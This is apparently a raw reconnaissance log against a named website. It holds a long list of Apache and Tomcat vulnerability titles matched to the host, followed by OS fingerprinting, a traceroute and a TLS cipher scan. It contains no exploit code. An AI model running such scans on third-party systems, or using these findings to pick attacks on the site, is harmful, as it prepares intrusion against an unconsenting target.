| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
| [43452] Apache Tomcat HTTP Request Smuggling
| [43309] Apache Geronimo LoginModule Login Method Bypass
| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
| [42091] Apache Maven Site Plugin Installation Permission Weakness
| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
| [40262] Apache HTTP Server mod_status refresh XSS
| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
9095| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
9096| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
9097| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
9098| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
9099| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
9100| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
9101| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
9102| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
9103| [36080] Apache Tomcat JSP Examples Crafted URI XSS
9104| [36079] Apache Tomcat Manager Uploaded Filename XSS
9105| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
9106| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
9107| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
9108| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
9109| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
9110| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
9111| [34881] Apache Tomcat Malformed Accept-Language Header XSS
9112| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
9113| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
9114| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
9115| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
9116| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
9117| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
9118| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
9119| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
9120| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
9121| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
9122| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
9123| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
9124| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
9125| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
9126| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
9127| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
9128| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
9129| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
9130| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
9131| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
9132| [32724] Apache mod_python _filter_read Freed Memory Disclosure
9133| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
9134| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
9135| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
9136| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
9137| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
9138| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
9139| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
9140| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
9141| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
9142| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
9143| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
9144| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
9145| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
9146| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
9147| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
9148| [24365] Apache Struts Multiple Function Error Message XSS
9149| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
9150| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
9151| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
9152| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
9153| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
9154| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
9155| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
9156| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
9157| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
9158| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
9159| [22459] Apache Geronimo Error Page XSS
9160| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
9161| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
9162| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
9163| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
9164| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
9165| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
9166| [21021] Apache Struts Error Message XSS
9167| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
9168| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
9169| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
9170| [20439] Apache Tomcat Directory Listing Saturation DoS
9171| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
9172| [20285] Apache HTTP Server Log File Control Character Injection
9173| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
9174| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
9175| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
9176| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
9177| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
9178| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
9179| [19821] Apache Tomcat Malformed Post Request Information Disclosure
9180| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
9181| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
9182| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
9183| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
9184| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
9185| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
9186| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
9187| [18233] Apache HTTP Server htdigest user Variable Overfow
9188| [17738] Apache HTTP Server HTTP Request Smuggling
9189| [16586] Apache HTTP Server Win32 GET Overflow DoS
9190| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
9191| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
9192| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
9193| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
9194| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
9195| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
9196| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
9197| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
9198| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
9199| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
9200| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
9201| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
9202| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
9203| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
9204| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
9205| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
9206| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
9207| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
9208| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
9209| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
9210| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
9211| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
9212| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
9213| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
9214| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
9215| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
9216| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
9217| [13304] Apache Tomcat realPath.jsp Path Disclosure
9218| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
9219| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
9220| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
9221| [12848] Apache HTTP Server htdigest realm Variable Overflow
9222| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
9223| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
9224| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
9225| [12557] Apache HTTP Server prefork MPM accept Error DoS
9226| [12233] Apache Tomcat MS-DOS Device Name Request DoS
9227| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
9228| [12231] Apache Tomcat web.xml Arbitrary File Access
9229| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
9230| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
9231| [12178] Apache Jakarta Lucene results.jsp XSS
9232| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
9233| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
9234| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
9235| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
9236| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
9237| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
9238| [10471] Apache Xerces-C++ XML Parser DoS
9239| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
9240| [10068] Apache HTTP Server htpasswd Local Overflow
9241| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
9242| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
9243| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
9244| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
9245| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
9246| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
9247| [9717] Apache HTTP Server mod_cookies Cookie Overflow
9248| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
9249| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
9250| [9714] Apache Authentication Module Threaded MPM DoS
9251| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
9252| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
9253| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
9254| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
9255| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
9256| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
9257| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
9258| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
9259| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
9260| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
9261| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
9262| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
9263| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
9264| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
9265| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
9266| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
9267| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
9268| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
9269| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
9270| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
9271| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
9272| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
9273| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
9274| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
9275| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
9276| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
9277| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
9278| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
9279| [9208] Apache Tomcat .jsp Encoded Newline XSS
9280| [9204] Apache Tomcat ROOT Application XSS
9281| [9203] Apache Tomcat examples Application XSS
9282| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
9283| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
9284| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
9285| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
9286| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
9287| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
9288| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
9289| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
9290| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
9291| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
9292| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
9293| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
9294| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
9295| [7611] Apache HTTP Server mod_alias Local Overflow
9296| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
9297| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
9298| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
9299| [6882] Apache mod_python Malformed Query String Variant DoS
9300| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
9301| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
9302| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
9303| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
9304| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
9305| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
9306| [5526] Apache Tomcat Long .JSP URI Path Disclosure
9307| [5278] Apache Tomcat web.xml Restriction Bypass
9308| [5051] Apache Tomcat Null Character DoS
9309| [4973] Apache Tomcat servlet Mapping XSS
9310| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
9311| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
9312| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
9313| [4568] mod_survey For Apache ENV Tags SQL Injection
9314| [4553] Apache HTTP Server ApacheBench Overflow DoS
9315| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
9316| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
9317| [4383] Apache HTTP Server Socket Race Condition DoS
9318| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
9319| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
9320| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
9321| [4231] Apache Cocoon Error Page Server Path Disclosure
9322| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
9323| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
9324| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
9325| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
9326| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
9327| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
9328| [3322] mod_php for Apache HTTP Server Process Hijack
9329| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
9330| [2885] Apache mod_python Malformed Query String DoS
9331| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
9332| [2733] Apache HTTP Server mod_rewrite Local Overflow
9333| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
9334| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
9335| [2149] Apache::Gallery Privilege Escalation
9336| [2107] Apache HTTP Server mod_ssl Host: Header XSS
9337| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
9338| [1833] Apache HTTP Server Multiple Slash GET Request DoS
9339| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
9340| [872] Apache Tomcat Multiple Default Accounts
9341| [862] Apache HTTP Server SSI Error Page XSS
9342| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
9343| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
9344| [845] Apache Tomcat MSDOS Device XSS
9345| [844] Apache Tomcat Java Servlet Error Page XSS
9346| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
9347| [838] Apache HTTP Server Chunked Encoding Remote Overflow
9348| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
9349| [775] Apache mod_python Module Importing Privilege Function Execution
9350| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
9351| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
9352| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
9353| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
9354| [637] Apache HTTP Server UserDir Directive Username Enumeration
9355| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
9356| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
9357| [562] Apache HTTP Server mod_info /server-info Information Disclosure
9358| [561] Apache Web Servers mod_status /server-status Information Disclosure
9359| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
9360| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
9361| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
9362| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
9363| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
9364| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
9365| [376] Apache Tomcat contextAdmin Arbitrary File Access
9366| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
9367| [222] Apache HTTP Server test-cgi Arbitrary File Access
9368| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
9369| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
9370|_
9371Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
9372Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
9373No exact OS matches for host (test conditions non-ideal).
9374Network Distance: 10 hops
9375
9376TRACEROUTE (using port 443/tcp)
9377HOP RTT ADDRESS
93781 176.46 ms 10.247.200.1
93792 177.65 ms 213.184.122.97
93803 176.65 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
93814 176.69 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
93825 176.89 ms bzq-179-124-82.cust.bezeqint.net (212.179.124.82)
93836 177.14 ms bzq-219-189-2.cablep.bezeqint.net (62.219.189.2)
93847 231.81 ms bzq-219-189-73.dsl.bezeqint.net (62.219.189.73)
93858 ... 9
938610 239.24 ms 89.248.174.131
9387################################################################################################################################
9388Version: 1.11.13-static
9389OpenSSL 1.0.2-chacha (1.0.2g-dev)
9390
9391Connected to 89.248.174.131
9392
9393Testing SSL server idolblog.tv on port 443 using SNI name idolblog.tv
9394
9395 TLS Fallback SCSV:
9396Server supports TLS Fallback SCSV
9397
9398 TLS renegotiation:
9399Secure session renegotiation supported
9400
9401 TLS Compression:
9402Compression disabled
9403
9404 Heartbleed:
9405TLS 1.2 not vulnerable to heartbleed
9406TLS 1.1 not vulnerable to heartbleed
9407TLS 1.0 not vulnerable to heartbleed
9408
9409 Supported Server Cipher(s):
9410Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
9411Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
9412Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
9413Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
9414Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
9415Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
9416Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
9417Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
9418Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
9419Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
9420Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
9421Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
9422Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
9423Accepted TLSv1.2 128 bits AES128-GCM-SHA256
9424Accepted TLSv1.2 256 bits AES256-GCM-SHA384
9425Accepted TLSv1.2 128 bits AES128-SHA256
9426Accepted TLSv1.2 256 bits AES256-SHA256
9427Accepted TLSv1.2 128 bits AES128-SHA
9428Accepted TLSv1.2 256 bits AES256-SHA
9429Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
9430Accepted TLSv1.2 256 bits CAMELLIA256-SHA
9431Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
9432Accepted TLSv1.2 128 bits CAMELLIA128-SHA
9433Accepted TLSv1.2 112 bits DES-CBC3-SHA
9434Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
9435Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
9436Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
9437Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
9438Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
9439Accepted TLSv1.1 128 bits AES128-SHA
9440Accepted TLSv1.1 256 bits AES256-SHA
9441Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
9442Accepted TLSv1.1 256 bits CAMELLIA256-SHA
9443Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
9444Accepted TLSv1.1 128 bits CAMELLIA128-SHA
9445Accepted TLSv1.1 112 bits DES-CBC3-SHA
9446Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
9447Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
9448Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
9449Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
9450Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
9451Accepted TLSv1.0 128 bits AES128-SHA
9452Accepted TLSv1.0 256 bits AES256-SHA
9453Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
9454Accepted TLSv1.0 256 bits CAMELLIA256-SHA
9455Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
9456Accepted TLSv1.0 128 bits CAMELLIA128-SHA
